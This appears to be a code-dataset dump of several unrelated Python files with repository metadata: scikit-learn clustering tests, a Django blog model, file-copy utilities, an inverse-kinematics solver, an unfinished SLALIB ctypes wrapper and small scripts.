seed=42):
# Compute score for random uniform cluster labelings
random_labels = np.random.RandomState(seed).randint
scores = np.zeros((len(k_range), n_runs))
for i, k in enumerate(k_range):
for j in range(n_runs):
labels_a = random_labels(low=0, high=k, size=n_samples)
labels_b = random_labels(low=0, high=k, size=n_samples)
scores[i, j] = score_func(labels_a, labels_b)
return scores
@ignore_warnings(category=FutureWarning)
def test_adjustment_for_chance():
# Check that adjusted scores are almost zero on random labels
n_clusters_range = [2, 10, 50, 90]
n_samples = 100
n_runs = 10
scores = uniform_labelings_scores(
adjusted_rand_score, n_samples, n_clusters_range, n_runs)
max_abs_scores = np.abs(scores).max(axis=1)
assert_array_almost_equal(max_abs_scores, [0.02, 0.03, 0.03, 0.02], 2)
@ignore_warnings(category=FutureWarning)
def test_adjusted_mutual_info_score():
# Compute the Adjusted Mutual Information and test against known values
labels_a = np.array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3])
labels_b = np.array([1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 3, 1, 3, 3, 3, 2, 2])
# Mutual information
mi = mutual_info_score(labels_a, labels_b)
assert_almost_equal(mi, 0.41022, 5)
# with provided sparse contingency
C = contingency_matrix(labels_a, labels_b, sparse=True)
mi = mutual_info_score(labels_a, labels_b, contingency=C)
assert_almost_equal(mi, 0.41022, 5)
# with provided dense contingency
C = contingency_matrix(labels_a, labels_b)
mi = mutual_info_score(labels_a, labels_b, contingency=C)
assert_almost_equal(mi, 0.41022, 5)
# Expected mutual information
n_samples = C.sum()
emi = expected_mutual_information(C, n_samples)
assert_almost_equal(emi, 0.15042, 5)
# Adjusted mutual information
ami = adjusted_mutual_info_score(labels_a, labels_b)
assert_almost_equal(ami, 0.27502, 5)
ami = adjusted_mutual_info_score([1, 1, 2, 2], [2, 2, 3, 3])
assert_equal(ami, 1.0)
# Test with a very large array
a110 = np.array([list(labels_a) * 110]).flatten()
b110 = np.array([list(labels_b) * 110]).flatten()
ami = adjusted_mutual_info_score(a110, b110)
# This is not accurate to more than 2 places
assert_almost_equal(ami, 0.37, 2)
def test_expected_mutual_info_overflow():
# Test for regression where contingency cell exceeds 2**16
# leading to overflow in np.outer, resulting in EMI > 1
assert expected_mutual_information(np.array([[70000]]), 70000) <= 1
def test_int_overflow_mutual_info_fowlkes_mallows_score():
# Test overflow in mutual_info_classif and fowlkes_mallows_score
x = np.array([1] * (52632 + 2529) + [2] * (14660 + 793) + [3] * (3271 +
204) + [4] * (814 + 39) + [5] * (316 + 20))
y = np.array([0] * 52632 + [1] * 2529 + [0] * 14660 + [1] * 793 +
[0] * 3271 + [1] * 204 + [0] * 814 + [1] * 39 + [0] * 316 +
[1] * 20)
assert_all_finite(mutual_info_score(x, y))
assert_all_finite(fowlkes_mallows_score(x, y))
def test_entropy():
ent = entropy([0, 0, 42.])
assert_almost_equal(ent, 0.6365141, 5)
assert_almost_equal(entropy([]), 1)
def test_contingency_matrix():
labels_a = np.array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3])
labels_b = np.array([1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 3, 1, 3, 3, 3, 2, 2])
C = contingency_matrix(labels_a, labels_b)
C2 = np.histogram2d(labels_a, labels_b,
bins=(np.arange(1, 5),
np.arange(1, 5)))[0]
assert_array_almost_equal(C, C2)
C = contingency_matrix(labels_a, labels_b, eps=.1)
assert_array_almost_equal(C, C2 + .1)
def test_contingency_matrix_sparse():
labels_a = np.array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3])
labels_b = np.array([1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 3, 1, 3, 3, 3, 2, 2])
C = contingency_matrix(labels_a, labels_b)
C_sparse = contingency_matrix(labels_a, labels_b, sparse=True).toarray()
assert_array_almost_equal(C, C_sparse)
C_sparse = assert_raise_message(ValueError,
"Cannot set 'eps' when sparse=True",
contingency_matrix, labels_a, labels_b,
eps=1e-10, sparse=True)
@ignore_warnings(category=FutureWarning)
def test_exactly_zero_info_score():
# Check numerical stability when information is exactly zero
for i in np.logspace(1, 4, 4).astype(np.int):
labels_a, labels_b = (np.ones(i, dtype=np.int),
np.arange(i, dtype=np.int))
assert_equal(normalized_mutual_info_score(labels_a, labels_b), 0.0)
assert_equal(v_measure_score(labels_a, labels_b), 0.0)
assert_equal(adjusted_mutual_info_score(labels_a, labels_b), 0.0)
assert_equal(normalized_mutual_info_score(labels_a, labels_b), 0.0)
for method in ["min", "geometric", "arithmetic", "max"]:
assert adjusted_mutual_info_score(labels_a, labels_b,
method) == 0.0
assert normalized_mutual_info_score(labels_a, labels_b,
method) == 0.0
def test_v_measure_and_mutual_information(seed=36):
# Check relation between v_measure, entropy and mutual information
for i in np.logspace(1, 4, 4).astype(np.int):
random_state = np.random.RandomState(seed)
labels_a, labels_b = (random_state.randint(0, 10, i),
random_state.randint(0, 10, i))
assert_almost_equal(v_measure_score(labels_a, labels_b),
2.0 * mutual_info_score(labels_a, labels_b) /
(entropy(labels_a) + entropy(labels_b)), 0)
avg = 'arithmetic'
assert_almost_equal(v_measure_score(labels_a, labels_b),
normalized_mutual_info_score(labels_a, labels_b,
average_method=avg)
)
def test_fowlkes_mallows_score():
# General case
score = fowlkes_mallows_score([0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 2, 2])
assert_almost_equal(score, 4. / np.sqrt(12. * 6.))
# Perfect match but where the label names changed
perfect_score = fowlkes_mallows_score([0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0])
assert_almost_equal(perfect_score, 1.)
# Worst case
worst_score = fowlkes_mallows_score([0, 0, 0, 0, 0, 0],
[0, 1, 2, 3, 4, 5])
assert_almost_equal(worst_score, 0.)
def test_fowlkes_mallows_score_properties():
# handcrafted example
labels_a = np.array([0, 0, 0, 1, 1, 2])
labels_b = np.array([1, 1, 2, 2, 0, 0])
expected = 1. / np.sqrt((1. + 3.) * (1. + 2.))
# FMI = TP / sqrt((TP + FP) * (TP + FN))
score_original = fowlkes_mallows_score(labels_a, labels_b)
assert_almost_equal(score_original, expected)
# symmetric property
score_symmetric = fowlkes_mallows_score(labels_b, labels_a)
assert_almost_equal(score_symmetric, expected)
# permutation property
score_permuted = fowlkes_mallows_score((labels_a + 1) % 3, labels_b)
assert_almost_equal(score_permuted, expected)
# symmetric and permutation(both together)
score_both = fowlkes_mallows_score(labels_b, (labels_a + 2) % 3)
assert_almost_equal(score_both, expected)
| [
"namithakonda09@gmail.com"
] | namithakonda09@gmail.com |
3b2147fdc39d45b2c72e4f2c7804a3e48682757f | 30efc8790f69be554c8d890df027a59d8de08e2b | /blog/models.py | f72950618fd5d1702b71f12a069ae16db5fdd2e6 | [] | no_license | julianyraiol/djangogirls-blog | 2bd1fdbe22b1cbbddda7600b675404cd93ff6af0 | 97361045f29c90d29c3cfe14137c3dfacba6b7c2 | refs/heads/master | 2020-04-01T20:55:41.201672 | 2018-10-18T20:16:52 | 2018-10-18T20:16:52 | 153,627,199 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 533 | py | from django.db import models
from django.utils import timezone
# Create your models here.
class Post(models.Model):
author = models.ForeignKey('auth.User', on_delete=models.CASCADE)
title = models.CharField(max_length=200)
text = models.TextField()
created_date = models.DateField(default=timezone.now)
published_date = models.DateField(blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.title
| [
"jrr.snf@uea.edu.br"
] | jrr.snf@uea.edu.br |
5cef4935661c78552c53eed251192490799624ff | ecdda4ae6fd2846df17cd9b0d58bdb64c400644b | /Greeting.py | 97a6cb51c0f0945699c0dc2607a1fb203b041a70 | [] | no_license | Kawboy442/MyPython | 649be1adbf1c43dc6aea80b3d6de94f4907d142c | 35eb83689e5846406f467dcd04ccdf0a6f66aaf9 | refs/heads/master | 2022-12-09T04:15:52.008475 | 2020-08-30T03:19:39 | 2020-08-30T03:19:39 | 287,887,525 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49 | py | x = 10
y = 2
z = 10
print(x == y)
print(x != z)
| [
"kawboy442@gmail.com"
] | kawboy442@gmail.com |
dc1da1c9ef73b27d7f9f46ca1946632acac00f72 | c2f88e323b6a83b8bacdc57cd133d6d6dbf4c3fe | /src/rendre/utils.py | 8307c0011aa4312502ccd79c0f156c5c7d03bdd6 | [] | no_license | claudioperez/rendre | 6a6ee9436da5e2e44d45d5c5c167cbe3c962697e | 7973742ce4c38735764c3a9babaa899a6521ca29 | refs/heads/master | 2023-05-31T20:14:35.111339 | 2021-06-19T04:16:45 | 2021-06-19T04:16:45 | 321,309,990 | 0 | 0 | null | 2021-02-11T16:18:16 | 2020-12-14T10:17:39 | Python | UTF-8 | Python | false | false | 7,994 | py | import re, os, sys, shutil
from pathlib import Path
import logging
from typing import List, Set
import coloredlogs
import yaml
# Module-wide logger.  coloredlogs.install() attaches a colorized console
# handler to the root logger, so this affects logging output process-wide,
# not just this module.
logger = logging.getLogger(__name__)
coloredlogs.install()
class Error(OSError):
    """Base exception type for failures raised by this module's utilities."""
def isrepository(url_string):
    """Return True if *url_string* looks like a repository URL.

    A URL counts as a repository when its path has exactly three
    components, e.g. ('/', 'owner', 'repo') for 'https://host/owner/repo'.
    """
    # Bug fix: `urllib` was used here but never imported at module level,
    # so this function raised NameError; import it locally.
    import urllib.parse

    url_object = urllib.parse.urlparse(url_string)
    url_path = Path(url_object.path)
    return len(url_path.parts) == 3
def get_resource_location(rsrc, config):
    """Resolve the on-disk path of a resource entry.

    ``rsrc`` must carry both 'archive' (an environment-style variable
    naming the project root) and 'archive_location' (path relative to it).
    Returns None (after logging) when the info is missing or lookup fails.
    """
    if "archive_location" in rsrc and "archive" in rsrc:
        pass
    else:
        logger.error(f"{rsrc['id']}: insufficient archive info")
        return
    try:
        # Prefer the tool's own environment map; fall back to the process
        # environment, stripping any leading '$' from the variable name.
        if rsrc["archive"] in config.environ:
            projdir = config.environ[rsrc["archive"]]
        else:
            projdir = os.environ.get(rsrc['archive'].replace('$', ''))
    except Exception as e:
        logger.error(f"[{rsrc['id']}]: {e}")
        return
    # NOTE(review): projdir may be None here (unset env var), which makes
    # os.path.join raise TypeError -- confirm callers guard against this.
    return os.path.join(projdir, rsrc['archive_location'])
def copy_file(src, dst, dst_root=None, rules: Set[str] = None, *, follow_symlinks=True):
    """Copy *src* to *dst* with metadata (based on shutil.copy2).

    When *rules* is given, the destination path relative to *dst_root* is
    rewritten through each rule; an empty rewrite result skips the copy
    entirely (returns None).  Returns the final destination path otherwise.
    """
    if rules:
        relpath = os.path.relpath(dst, dst_root)
        logger.debug("relpath={}".format(relpath))
        for rule in rules:
            # NOTE(review): `sed` is not defined anywhere in this module --
            # presumably a path-rewrite helper; confirm where it comes from.
            relpath = sed(rule, relpath)
            logger.debug("new relpath={}".format(relpath))
        if relpath:
            dst = os.path.join(dst_root, relpath)
        else:
            # A rule mapped the path to nothing: deliberately skip the file.
            return
    if dst and os.path.isdir(dst):
        # Copying into a directory: keep the source file name.
        dst = os.path.join(dst, os.path.basename(src))
    shutil.copyfile(src, dst, follow_symlinks=follow_symlinks)
    shutil.copystat(src, dst, follow_symlinks=follow_symlinks)
    return dst
def _copytree(entries, src, dst, dst_root, rules, symlinks, ignore, copy_function,
              ignore_dangling_symlinks, dirs_exist_ok=False):
    """Recursive worker for copy_tree (adapted from shutil._copytree).

    Copies every entry of *src* into *dst*, optionally rewriting destination
    paths relative to *dst_root* through *rules*.  Accumulates per-file
    failures and raises a single Error at the end, like shutil.copytree.
    """
    if ignore is not None:
        ignored_names = ignore(os.fspath(src), [x.name for x in entries])
    else:
        ignored_names = set()
    if rules:
        relpath = os.path.relpath(dst, dst_root)
        logger.debug("relpath={}".format(relpath))
        for rule in rules:
            # NOTE(review): `sed` is not defined in this module -- see copy_file.
            relpath = sed(rule, relpath)
            logger.debug("new relpath={}".format(relpath))
        if relpath:
            dst = os.path.join(dst_root, relpath)
        else:
            # Rules mapped this directory to nothing: skip the whole subtree.
            return
    os.makedirs(dst, exist_ok=dirs_exist_ok)
    errors = []
    # Our copy_file (like shutil.copy) accepts os.DirEntry objects directly.
    use_srcentry = copy_function is copy_file or copy_function is shutil.copy
    for srcentry in entries:
        if srcentry.name in ignored_names:
            continue
        srcname = os.path.join(src, srcentry.name)
        dstname = os.path.join(dst, srcentry.name)
        ##########################################################################
        # NOTE(review): this in-loop rules pass recomputes relpath from `dst`
        # (not `dstname`) and reassigns `dst`, and its `return` aborts the
        # remaining entries mid-iteration -- looks like a copy/paste of the
        # block above; confirm intent.
        if rules:
            relpath = os.path.relpath(dst, dst_root)
            logger.debug("relpath={}".format(relpath))
            for rule in rules:
                relpath = sed(rule, relpath)
                logger.debug("new relpath={}".format(relpath))
            if relpath:
                dst = os.path.join(dst_root, relpath)
            else:
                return
        ##########################################################################
        srcobj = srcentry if use_srcentry else srcname
        try:
            is_symlink = srcentry.is_symlink()
            if is_symlink and os.name == 'nt':
                # Special check for directory junctions, which appear as
                # symlinks but we want to recurse.
                # NOTE(review): the `stat` module is not imported in this
                # file, so this Windows-only branch would raise NameError.
                lstat = srcentry.stat(follow_symlinks=False)
                if lstat.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT:
                    is_symlink = False
            if is_symlink:
                linkto = os.readlink(srcname)
                if symlinks:
                    # We can't just leave it to `copy_function` because legacy
                    # code with a custom `copy_function` may rely on copytree
                    # doing the right thing.
                    os.symlink(linkto, dstname)
                    shutil.copystat(srcobj, dstname, follow_symlinks=not symlinks)
                else:
                    # ignore dangling symlink if the flag is on
                    if not os.path.exists(linkto) and ignore_dangling_symlinks:
                        continue
                    # otherwise let the copy occur. copy2 will raise an error
                    if srcentry.is_dir():
                        copy_tree(srcobj, dstname, dst_root, rules, symlinks, ignore,
                                  copy_function, dirs_exist_ok=dirs_exist_ok)
                    else:
                        copy_function(srcobj, dstname, dst_root, rules)
            elif srcentry.is_dir():
                copy_tree(srcobj, dstname, dst_root, rules, symlinks, ignore, copy_function,
                          dirs_exist_ok=dirs_exist_ok)
            else:
                # Will raise a SpecialFileError for unsupported file types
                copy_function(srcobj, dstname, dst_root, rules)
        # catch the Error from the recursive copytree so that we can
        # continue with other files
        except Error as err:
            errors.extend(err.args[0])
        except OSError as why:
            errors.append((srcname, dstname, str(why)))
    try:
        shutil.copystat(src, dst)
    except OSError as why:
        # Copying file access times may fail on Windows
        if getattr(why, 'winerror', None) is None:
            errors.append((src, dst, str(why)))
    if errors:
        raise Error(errors)
    return dst
def copy_tree(src, dst, dst_root=None, rules: Set[str] = None, symlinks=False, ignore=None, copy_function=copy_file,
              ignore_dangling_symlinks=False, dirs_exist_ok=True):
    """Recursively copy a directory tree and return the destination directory.

    dirs_exist_ok dictates whether to raise an exception in case dst or any
    missing parent directory already exists.

    If exception(s) occur, an Error is raised with a list of reasons.

    If the optional symlinks flag is true, symbolic links in the
    source tree result in symbolic links in the destination tree; if
    it is false, the contents of the files pointed to by symbolic
    links are copied. If the file pointed by the symlink doesn't
    exist, an exception will be added in the list of errors raised in
    an Error exception at the end of the copy process.

    You can set the optional ignore_dangling_symlinks flag to true if you
    want to silence this exception. Notice that this has no effect on
    platforms that don't support os.symlink.

    The optional ignore argument is a callable. If given, it
    is called with the `src` parameter, which is the directory
    being visited by copy_tree(), and `names` which is the list of
    `src` contents, as returned by os.listdir():

        callable(src, names) -> ignored_names

    Since copy_tree() is called recursively, the callable will be
    called once for each directory that is copied. It returns a
    list of names relative to the `src` directory that should
    not be copied.

    The optional copy_function argument is a callable that will be used
    to copy each file. It will be called with the source path and the
    destination path as arguments. By default, copy2() is used, but any
    function that supports the same signature (like copy()) can be used.
    """
    # sys.audit exists only on Python 3.8+.
    sys.audit("shutil.copytree", src, dst)
    with os.scandir(src) as itr:
        entries = list(itr)
    # A falsy dst silently skips the copy and returns None.
    if dst:
        return _copytree(entries=entries, src=src, dst=dst, dst_root=dst_root, rules=rules, symlinks=symlinks,
                         ignore=ignore, copy_function=copy_function,
                         ignore_dangling_symlinks=ignore_dangling_symlinks,
                         dirs_exist_ok=dirs_exist_ok)
| [
"50180406+claudioperez@users.noreply.github.com"
] | 50180406+claudioperez@users.noreply.github.com |
b9779c1b99685242bc97b9e16a2a2a14fe35eb1a | ddfba4105540ff51a1e29fbbeaf8042003310bfa | /jacobianIKE.py | 67d272ae3ceaaba65d156a4d60ea5ea6e091f676 | [] | no_license | edroderick/ECE590-midterm2 | ea0283fc19340c9e439a4c93c49d01914e858c39 | df0cb411c89dfd01fbc9a5105403be483bceab33 | refs/heads/master | 2021-01-19T11:12:11.437212 | 2014-11-20T03:54:08 | 2014-11-20T03:54:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,834 | py | #!/usr/bin/env python
import math
import numpy as np
from numpy.linalg import inv
def jacobianIKE(xg, yg):
    """Iterative inverse kinematics for a planar three-link arm (Python 2).

    Builds a finite-difference Jacobian each iteration and steps the three
    joint angles along the left pseudo-inverse direction until the end
    effector is within `threshold` of the goal (xg, yg).  Prints the final
    end-effector position; returns None.
    """
    threshold = .001   # stop when end-effector distance to goal is below this
    alpha = .1         # gain applied to each joint-angle update
    # finite-difference perturbation per joint
    dt1 = .001
    dt2 = .001
    dt3 = .001
    # initial joint angles (slightly non-zero starting pose)
    t1 = 0.001
    t2 = 0.001
    t3 = 0.001
    # link lengths
    l1 = .3
    l2 = .2
    l3 = .1
    e = 1  # seed error so the loop runs at least once
    while (e > threshold):
        #compute current position
        x = l1*math.cos(t1)+l2*math.cos(t1+t2)+l3*math.cos(t1+t2+t3)
        y = l1*math.sin(t1)+l2*math.sin(t1+t2)+l3*math.sin(t1+t2+t3)
        e = math.sqrt((xg - x)**2+(yg - y)**2)
        #compute error by advancing by dt values and subtracting from goal position
        eX = l1*math.cos(t1+dt1)+l2*math.cos(t1+dt1+t2+dt2)+l3*math.cos(t1+dt1+t2+dt2+t3+dt3) - xg
        eY = l1*math.sin(t1+dt1)+l2*math.sin(t1+dt1+t2+dt2)+l3*math.sin(t1+dt1+t2+dt2+t3+dt3) - yg
        dE = np.array([[eX],[eY]])
        #compute jacobian (each column: position change from perturbing one joint)
        dxt1 = l1*math.cos(t1+dt1)+l2*math.cos(t1+dt1+t2)+l3*math.cos(t1+dt1+t2+t3) - x
        dyt1 = l1*math.sin(t1+dt1)+l2*math.sin(t1+dt1+t2)+l3*math.sin(t1+dt1+t2+t3) - y
        dxt2 = l1*math.cos(t1)+l2*math.cos(t1+t2+dt2)+l3*math.cos(t1+t2+dt2+t3) - x
        dyt2 = l1*math.sin(t1)+l2*math.sin(t1+t2+dt2)+l3*math.sin(t1+t2+dt2+t3) - y
        dxt3 = l1*math.cos(t1)+l2*math.cos(t1+t2)+l3*math.cos(t1+t2+t3+dt3) - x
        dyt3 = l1*math.sin(t1)+l2*math.sin(t1+t2)+l3*math.sin(t1+t2+t3+dt3) - y
        J = np.array([[dxt1/dt1, dxt2/dt2, dxt3/dt3],[dyt1/dt1, dyt2/dt2, dyt3/dt3]])
        # left pseudo-inverse: (J^T J)^-1 J^T
        Jplus = inv(J.T.dot(J)).dot(J.T)
        dTheta = Jplus.dot(dE)
        #calculate new joint angles
        t1 = t1 - dTheta[0,0]*alpha
        t2 = t2 - dTheta[1,0]*alpha
        t3 = t3 - dTheta[2,0]*alpha
    print 'x= ', x, ' y= ', y
    return
# Smoke tests: drive the arm to several goal points (Python 2 prints).
jacobianIKE(.1,.1)
print '**BREAK**'
jacobianIKE(.2,.2)
print '**BREAK**'
jacobianIKE(.3,.3)
print '**BREAK**'
jacobianIKE(0.0,.3)
print '**BREAK**'
jacobianIKE(-.1, .1)
print '**BREAK**'
jacobianIKE(-.2, .2)
print '**BREAK**'
jacobianIKE(.3, -.2)
#jacobianIKE(.3,.8)
| [
"roderickvt@gmail.com"
] | roderickvt@gmail.com |
be41ce397c4e941352db90b3dc624fd17cdb6f4a | 43c129b6b9fbea67a23e034a469f7f2374fb2bf0 | /slalib.py | 92160a3e452a4622caf2efec6aece4e8b405d846 | [] | no_license | controlmanagement/modules | 5b0bd70fccaaa501eee094b80bda84111ab7b091 | d7d06f2e21458d877b02730c2928f7704c85e056 | refs/heads/master | 2021-01-24T06:18:05.892214 | 2017-10-26T11:07:11 | 2017-10-26T11:07:11 | 35,397,815 | 0 | 3 | null | 2017-10-24T04:31:31 | 2015-05-11T02:31:20 | Python | UTF-8 | Python | false | false | 6,035 | py | import math
import ctypes
import lib_slalib as lib
class slalib_controller(object):
    """ctypes wrappers around the SLALIB positional-astronomy C library
    (imported at module level as ``lib``).

    NOTE(review): the ctypes usage throughout this class looks unfinished:
    output arguments are created by calling POINTER classes with c_int
    values (instead of c_double instances passed via byref), several
    methods alias *all* output pointers to one object (e.g.
    ``ra = dec = ...``) so the results would overwrite each other, return
    values are read via ``.value`` without setting ``restype``, and there
    are literal typos flagged inline below.  Confirm against the SLALIB C
    API before relying on any of these wrappers.
    """
    # Shorthand aliases for the ctypes scalar and pointer types.
    _P = ctypes.POINTER
    _char_p = ctypes.c_char_p
    _uchar = ctypes.c_ubyte
    _uchar_p = _P(ctypes.c_ubyte)
    _ushort = ctypes.c_ushort
    _ushort_p = _P(ctypes.c_ushort)
    _int = ctypes.c_int
    _int_p = _P(ctypes.c_int)
    _uint = ctypes.c_uint
    _long = ctypes.c_long
    _long_p = _P(ctypes.c_long)
    _ulong = ctypes.c_ulong
    _ulong_p = _P(ctypes.c_ulong)
    _float = ctypes.c_float
    _float_p = _P(ctypes.c_float)
    _double = ctypes.c_double
    _double_p = _P(ctypes.c_double)
    _void_p = ctypes.c_void_p

    def slaDcc2s(self, v):
        """Wrapper for the C routine slaDcc2s."""
        # NOTE(review): ra and dec alias the same pointer object.
        ra = dec = self._double_p(self._int(0))
        vc = self._double*6
        v = vc(*v)
        lib.slaDcc2s(v, ra, dec)
        return [ra.value, dec.value]

    def slaDranrm(self, ra):
        """Wrapper for the C routine slaDranrm."""
        ra = self._double(ra)
        # NOTE(review): without lib.slaDranrm.restype set, the return is an
        # int and has no .value attribute.
        ra = lib.slaDranrm(ra)
        return ra.value

    def slaDcs2c(self, ra, dec):
        """Wrapper for the C routine slaDcs2c."""
        ra = self._double(ra)
        dec = self._double(dec)
        # NOTE(review): this builds an array of *pointer* type; presumably
        # an array of c_double was intended.
        v = self._double_p*3
        data = [0]*3
        v = v(*data)
        lib.slaDcs2c(ra, dec, v)
        return v

    def slaPrec(self, begin_epoch, end_epoch):
        """Wrapper for the C routine slaPrec."""
        begin_epoch = self._double(begin_epoch)
        end_epoch = self._double(end_epoch)
        rmat = [[0,0,0],[0,0,0],[0,0,0]]
        # NOTE(review): c_double cannot be constructed from a nested list
        # (TypeError), and `lib.slaPrc` looks like a typo for slaPrec.
        rmat = self._double(rmat)
        lib.slaPrc(begin_epoch, end_epoch, rmat)
        return rmat

    def slaEpj(self, jd):
        """Wrapper for the C routine slaEpj."""
        jd = self._double(jd)
        # NOTE(review): .value on the raw return -- see slaDranrm.
        je = lib.slaEpj(jd)
        return je.value

    def slaDmxv(self, dm, va):
        """Wrapper for the C routine slaDmxv (matrix * vector)."""
        # All five names alias the same 3-element double array *type*.
        dum0 =dum1 = dum2 = c_va = vb = self._double*3
        data0 = data1 = data2 = []
        data0 = dm[0]
        data1 = dm[1]
        data2 = dm[2]
        dum0 = dum0(*data0)
        dum1 = dum1(*data1)
        dum2 = dum2(*data2)
        dum = [dum0,dum1,dum2] #doubtful??
        va = c_va(*va)
        data = [0]*3
        vb = vb(*data)
        lib.slaDmxv(dum, va, vb)
        return vb

    def slaGmst(self, ut1):
        """Wrapper for the C routine slaGmst."""
        ut1 = self._double(ut1)
        # NOTE(review): .value on the raw return -- see slaDranrm.
        st = lib.slaGmst(ut1)
        return st.value

    def slaPvobs(self, latitude, height, stl):
        """Wrapper for the C routine slaPvobs."""
        latitude = self._double(latitude)
        height = self._double(height)
        stl = self._double(stl)
        pv6 = self._double*6
        data = [0]*6
        pv6 = pv6(*data)
        lib.slaPvobs(latitude, height, stl, pv6)
        return pv6

    def slaPreces(self, FK, ep0, ep1, ra, dec):
        """Wrapper for the C routine slaPreces."""
        FK = self._uchar_p(FK)
        ep0 = self._double(ep0)
        ep1 = self._double(ep1)
        ra = self._double_p(self._float(ra))
        dec = self._double_p(self._float(dec))
        lib.slaPreces(FK, ep0, ep1, ra, dec)
        return [ra.value, dec.value]

    def slaNutc(self, date):
        """Wrapper for the C routine slaNutc."""
        date = self._double(date)
        # NOTE(review): the three outputs alias one pointer object.
        long = obliq = eps0 = self._double_p(self._int(0))
        lib.slaNutc(date, long, obliq, eps0)
        return [long.value, obliq.value, eps0.value]

    def slaFk425(self, r1950, d1950, dr1950, dd1950, p1950, v1950):
        """Wrapper for the C routine slaFk425 (FK4 B1950 -> FK5 J2000)."""
        r1950 = self._double(r1950)
        d1950 = self._double(d1950)
        dr1950 = self._double(dr1950)
        dd1950 = self._double(dd1950)
        p1950 = self._double(p1950)
        v1950 = self._double(v1950)
        # NOTE(review): the six outputs alias one pointer object.
        r2000 = d2000 = dr2000 = dd2000 = p2000 = v2000 = self._double_p(self._int(0))
        lib.slaFk425(r1950, d1950, dr1950, dd1950, p1950, v1950, r2000, d2000, dr2000, dd2000, p2000, v2000)
        return [r2000.value, d2000.value, dr2000.value, dd2000.value, p2000.value, v2000.value]

    def slaGaleq(self, long, lati):
        """Wrapper for the C routine slaGaleq."""
        long = self._double(long)
        lati = self._double(lati)
        ra = dec = self._double_p(self._int(0))
        lib.slaGaleq(long, lati, ra, dec)
        return [ra.value, dec.value]

    def slaMap(self, m_ra, m_dec, p_ra, p_dec, px, rv, eq, date):
        """Wrapper for the C routine slaMap."""
        m_ra = self._double(m_ra)
        m_dec = self._double(m_dec)
        # NOTE(review): `_doube` is a typo (AttributeError) and the argument
        # is p_dec, not p_ra; p_dec itself is never converted.
        p_ra = self._doube(p_dec)
        px = self._double(px)
        rv = self._double(rv)
        eq = self._double(eq)
        date = self._double(date)
        ap_ra = ap_dec = self._double_p(self._int(0))
        lib.slaMap(m_ra, m_dec, p_ra, p_dec, px, rv, eq, date, ap_ra, ap_dec)
        return [ap_ra.value, ap_dec.value]

    def slaAop(self, g_ra, g_dec, mjd, dut, m_long, m_lati, height, xp, yp, temp, pressure, humid, w_length, tlr):
        """Wrapper for the C routine slaAop (apparent -> observed place)."""
        g_ra = self._double(g_ra)
        g_dec = self._double(g_dec)
        mjd = self._double(mjd)
        dut = self._double(dut)
        m_long = self._double(m_long)
        m_lati = self._double(m_lati)
        height = self._double(height)
        xp = self._double(xp)
        yp = self._double(yp)
        temp = self._double(temp)
        pressure = self._double(pressure)
        humid = self._double(humid)
        w_length = self._double(w_length)
        tlr = self._double(tlr)
        # NOTE(review): the five outputs alias one pointer object.
        az = el = ha = dec = ra = self._double_p(self._int(0))
        lib.slaAop(g_ra, g_dec, mjd, dut, m_long, m_lati, height, xp, yp, temp, pressure, humid, w_length, tlr, az, el, ha, dec, ra)
        return [az.value, el.value, ha.value, ra.value, dec.value]

    def slaMappa(self, eq, tdb):
        """Wrapper for the C routine slaMappa."""
        eq = self._double(eq)
        tdb = self._double(tdb)
        amprms = self._double*21
        date = [0]*21
        amprms = amprms(*date)
        # NOTE(review): `mjd_tdb` is undefined here (NameError); the
        # converted parameter is named `tdb`.
        lib.slaMappa(eq, mjd_tdb, amprms)
        return amprms

    def slaAoppa(self, mjd_utc, dut, long, lat, alt, xp, yp, tmp, p, hu, wl, tlr):
        """Wrapper for the C routine slaAoppa."""
        mjd_utc = self._double(mjd_utc)
        dut = self._double(dut)
        # NOTE(review): `self,_double(long)` builds a tuple and references an
        # undefined `_double` name -- almost certainly meant self._double(long).
        long = self,_double(long)
        # NOTE(review): `_doubel` and `sele` below are typos for `_double`
        # and `self`.
        lat = self._doubel(lat)
        alt = self._double(alt)
        xp = sele._double(xp)
        yp = self._double(yp)
        tmp = self._double(tmp)
        p = self._double(p)
        hu = self._double(hu)
        wl = self._double(wl)
        tlr = self._double(tlr)
        # NOTE(review): array of pointer type; compare slaDcs2c.
        aoprms = self._double_p*14
        date = [0]*14
        aoprms = aoprms(*date)
        lib.slaAoppa(mjd_utc, dut, long, lat, alt, xp, yp, tmp, p, hu, wl, tlr, aoprms)
        return aoprms

    def slaOapqk(self, type, ob1, ob2, aoprms):
        """Wrapper for the C routine slaOapqk."""
        type = self._char_p(type)
        ob1 = self._double(ob1)
        ob2 = self._double(ob2)
        ra = dec = self._double_p(self._int(0))
        lib.slaOapqk(type, ob1, ob2, aoprms, ra, dec)
        return [ra.value, dec.value]

    def slaAmpqk(self, ra, dec, amprms):
        """Wrapper for the C routine slaAmpqk."""
        ra = self._double(ra)
        dec = self._double(dec)
        m_ra = m_dec = self._double_p(self._int(0))
        lib.slaAmpqk(ra, dec, amprms, m_ra, m_dec)
        return [m_ra.value, m_dec.value]
| [
"h.iwamura@a.phys.nagoya-u.ac.jp"
] | h.iwamura@a.phys.nagoya-u.ac.jp |
b1477d2207442ee22314b5403a9f972bfc5de20e | d4f8a0fb7b76df5416467e6ead4756738a663e97 | /images_videos_webcam.py | ad42009e98e1b5f65519df5a5aafc40d48f6de72 | [] | no_license | cocomon173/OpenCV | 237faa2cc597fa255c0853ed7c9bcde918770690 | e4a6b3ec5a6013144d066bdcac095e8ecb1993f5 | refs/heads/master | 2022-11-11T17:22:31.525489 | 2020-07-04T09:44:44 | 2020-07-04T09:44:44 | 277,077,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | import cv2
#
# cap = cv2.VideoCapture("Resources/파이썬 강의.mp4")
#while True:
